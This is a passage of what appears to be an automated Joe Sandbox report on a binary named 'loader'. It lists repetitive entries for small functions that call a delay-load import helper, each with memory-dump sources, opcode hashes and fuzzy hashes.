                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: bd507417c4ed9196eabae2eae28984883534113e1210dce44e556b5f00094b93
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: bd507417c4ed9196eabae2eae28984883534113e1210dce44e556b5f00094b93
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 4b7d3e71fe92e91eaec6e93e7fd4de36dfd020d005ea266b7c5c708820746c91
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 4b7d3e71fe92e91eaec6e93e7fd4de36dfd020d005ea266b7c5c708820746c91
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ed2a744de7ee1e3dd3c26cb9699d5cb4ad96475aabe883d904318843b8868c20
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: ed2a744de7ee1e3dd3c26cb9699d5cb4ad96475aabe883d904318843b8868c20
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d758ad2151fdea0549dd94834e098c4f2d39f4079f4c1cd33237e0d33b793ff5
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: d758ad2151fdea0549dd94834e098c4f2d39f4079f4c1cd33237e0d33b793ff5
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9d74cbb0f780cc2658d9f1c9fdb860e654351f924b571a472e9f63b33efc126e
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 9d74cbb0f780cc2658d9f1c9fdb860e654351f924b571a472e9f63b33efc126e
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 8895b57d9ce2d55a7fe5776cfc241726facfe7a2b06e8989ba7d57892508b6a3
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 8895b57d9ce2d55a7fe5776cfc241726facfe7a2b06e8989ba7d57892508b6a3
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 86c38c9ccb2e604287a32d7e3c7793c353c79fb451f0d956749b5b6050a50ca6
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 86c38c9ccb2e604287a32d7e3c7793c353c79fb451f0d956749b5b6050a50ca6
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 3e438330a201830fcaf86e0b873f19ba90b89629b066d1c3edbeb29832665dca
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 3e438330a201830fcaf86e0b873f19ba90b89629b066d1c3edbeb29832665dca
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 74bcfdbdd4e8e60fa2938ef0e66d12c9083575018bb8b29e6fccb236d31560ff
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 74bcfdbdd4e8e60fa2938ef0e66d12c9083575018bb8b29e6fccb236d31560ff
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011D8A3
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 09037e9d58a72d683f9a1ae654bf5756628e88db815ce4a826a368904252c79c
              • Instruction ID: b26e5de73d491f44fbe576d30f86d8cff53c3211c9829151976eb29954ea1697
              • Opcode Fuzzy Hash: 09037e9d58a72d683f9a1ae654bf5756628e88db815ce4a826a368904252c79c
              • Instruction Fuzzy Hash: 60A011A22AC003BCB00C2280BC82CBA020CC8C2B203B0882AF00BA00C0BB80288A0830
              Function 0011DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9b8fe61bb9de12ce1521c52b87f1f68510b329dc83761604e23533553b5f878b
              • Instruction ID: 37cc8ecb8a869fbc4c97f384fcc12d91812eb41772c7d63f95992218303c9ed4
              • Opcode Fuzzy Hash: 9b8fe61bb9de12ce1521c52b87f1f68510b329dc83761604e23533553b5f878b
              • Instruction Fuzzy Hash: B5A0129126C0023CB00CB141BC12C7B020CC4D0B11330412AB00A90044674008860431
              Function 0011DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 7d831e192c7c08d1a7d132d1c458ebced66b17a6f3fe306f8e9fa50566a0bb22
              • Instruction ID: c14535d17ee58cde01651d2100bb0f4b68b0c98c5a59faddf15f49df7d63c97f
              • Opcode Fuzzy Hash: 7d831e192c7c08d1a7d132d1c458ebced66b17a6f3fe306f8e9fa50566a0bb22
              • Instruction Fuzzy Hash: D9A011A22AC003BCB00CB282BC22CBB020CC8C0B203308A2AB00A80088AB80088A0832
              Function 0011DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 14c0388bb6f58265cf40c3edfd584125961e8789045c1042435f8b9fb338de71
              • Instruction ID: c14535d17ee58cde01651d2100bb0f4b68b0c98c5a59faddf15f49df7d63c97f
              • Opcode Fuzzy Hash: 14c0388bb6f58265cf40c3edfd584125961e8789045c1042435f8b9fb338de71
              • Instruction Fuzzy Hash: D9A011A22AC003BCB00CB282BC22CBB020CC8C0B203308A2AB00A80088AB80088A0832
              Function 0011DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 62de4021b4a550882bc237b770aa7bb0eeb32814f3d9261e6866501bfaeba5c4
              • Instruction ID: c14535d17ee58cde01651d2100bb0f4b68b0c98c5a59faddf15f49df7d63c97f
              • Opcode Fuzzy Hash: 62de4021b4a550882bc237b770aa7bb0eeb32814f3d9261e6866501bfaeba5c4
              • Instruction Fuzzy Hash: D9A011A22AC003BCB00CB282BC22CBB020CC8C0B203308A2AB00A80088AB80088A0832
              Function 0011DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.000000000013E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000144000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709721631.0000000000161000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.0000000000162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1710198497.00000000001A7000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_100000_loader.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 6b2cc2cdd3a912863ea1148c7ab47b3b64b985e7403643316e26e852d5e4efc9
              • Instruction ID: c14535d17ee58cde01651d2100bb0f4b68b0c98c5a59faddf15f49df7d63c97f
              • Opcode Fuzzy Hash: 6b2cc2cdd3a912863ea1148c7ab47b3b64b985e7403643316e26e852d5e4efc9
              • Instruction Fuzzy Hash: D9A011A22AC003BCB00CB282BC22CBB020CC8C0B203308A2AB00A80088AB80088A0832
              Function 0011DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
              Download Yara Rule
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0011DAB2
                • Part of subcall function 0011DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0011DFD6
                • Part of subcall function 0011DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0011DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.1709659613.0000000000101000.00000020.00000001.01000000.00000003.sdmp, Offset: 00100000, based on PE: true
              • Associated: 00000000.00000002.1709644297.0000000000100000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1709690483.0000000000133000.00000002.00000001.01000000.00000003.sdmpDownload File
